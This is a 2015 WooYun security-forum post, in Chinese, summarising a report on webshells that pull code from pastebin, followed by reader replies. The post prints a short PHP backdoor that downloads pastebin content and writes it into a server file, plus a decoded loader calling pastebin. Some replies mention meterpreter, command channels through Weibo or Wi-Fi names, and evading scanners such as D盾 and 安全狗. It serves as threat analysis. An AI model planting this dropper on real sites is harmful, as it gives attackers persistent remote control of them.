当前位置:WooYun(白帽子技术社区) >> 快速查找木马 >> 关于webshell的思路 - pastebin

关于webshell的思路 - pastebin

杀戮 (有事请 at 大号园长) | 2015-01-07 17:40

这两天某国外黑客写了一篇文章关于他发现的一种webshell中使用的手法,大体说说思路,原文就不翻译了,我懒。

简单来说就是通过一个很简单的代码远程通过pastebin下载代码并且执行。

code:
if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}


pastebin是一个国外黑客,程序员经常分享资源,种子,代码的地方。经常从国外获取资源的同学应该会知道经常有黑客把自己黑来的数据库直接放上面进行共享。pastebin允许用户下载原始格式的代码文件,就是说黑客可以使用后门直接下载其他黑客共享的后门,或者给网站植入存在漏洞的网页。

这是其中一个例子,代码已经经过解码。

pastebin-decoded.gif

还有一件事就是印度尼西亚某sb特地制作了pastebin编码器

FathurFreakz.gif

上面的代码解码后的结果。

function FathurFreakz($ct3){
xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);


总之要给出一个结论就是,像github pastebin这种充斥着数据和方便的功能的网站正在越来越多的被黑客利用。

分享到:
  1. 1#
    回复此人 感谢
    冷冷的夜 (1) | 2015-01-07 17:58

    这个前提是要能对外连接,要是直接能外联,一般直接上meterpreter了

  2. 2#
    回复此人 感谢
    piaoye (123) | 2015-01-07 17:59

    阿里云不错!!!yun shell

  3. 3# 感谢(1)
    回复此人 感谢
    DM_ (http://x0day.me) | 2015-01-07 17:59

    weibo都可以上线,能交互都可以搞上线。

    WIFI的SSID都可以用来上线。

  4. 4#
    回复此人 感谢
    RainShine (I'm your angel of music.) | 2015-01-08 12:55

    Yep,远程获取内容的Webshell。这玩意还将流行一段时期。这种Webshell易过D盾和安全狗的静态查杀。

  5. 5#
    回复此人 感谢
    TYPCN | 2015-01-08 13:18

    能外链的网页都可以吧。。。你放贴吧正则抓都一样

  6. 6#
    回复此人 感谢
    redrain有节操 (快来和我滚床单) | 2015-01-08 14:53

    远程获取的思路老早就有了,一篇分析http://www.freebuf.com/articles/web/29307.html

    类似的还有通过微博简介木马上线等等

  7. 7# 感谢(1)
    回复此人 感谢
    redrain有节操 (快来和我滚床单) | 2015-01-08 15:52

    http://blog.sucuri.net/2015/01/website-backdoors-leverage-the-pastebin-service.html
    看原文靠谱一点,这个贴子只大概说了下写的还有点懒,原文不错

  8. 8#
    回复此人 感谢
    围剿 (七月流火,八月未央,九月白露凝成轻霜) | 2015-01-08 17:06

    云shell时代来临,偶也。

  9. 9#
    回复此人 感谢
    RainShine (I'm your angel of music.) | 2015-01-08 18:12

    @围剿 大概php最早出现是在10年吧。暗组有个这样的Webshell。
    据说asp在05年就有某牛做出来了。
    贴一个链接,大家看看吧:http://zone.wooyun.org/content/15358

  10. 10#
    回复此人 感谢
    RainShine (I'm your angel of music.) | 2015-01-08 18:16

    当时貌似只是远程下载到web目录,后来有了WGet然后执行的。

  11. 11#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2015-01-09 19:03

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录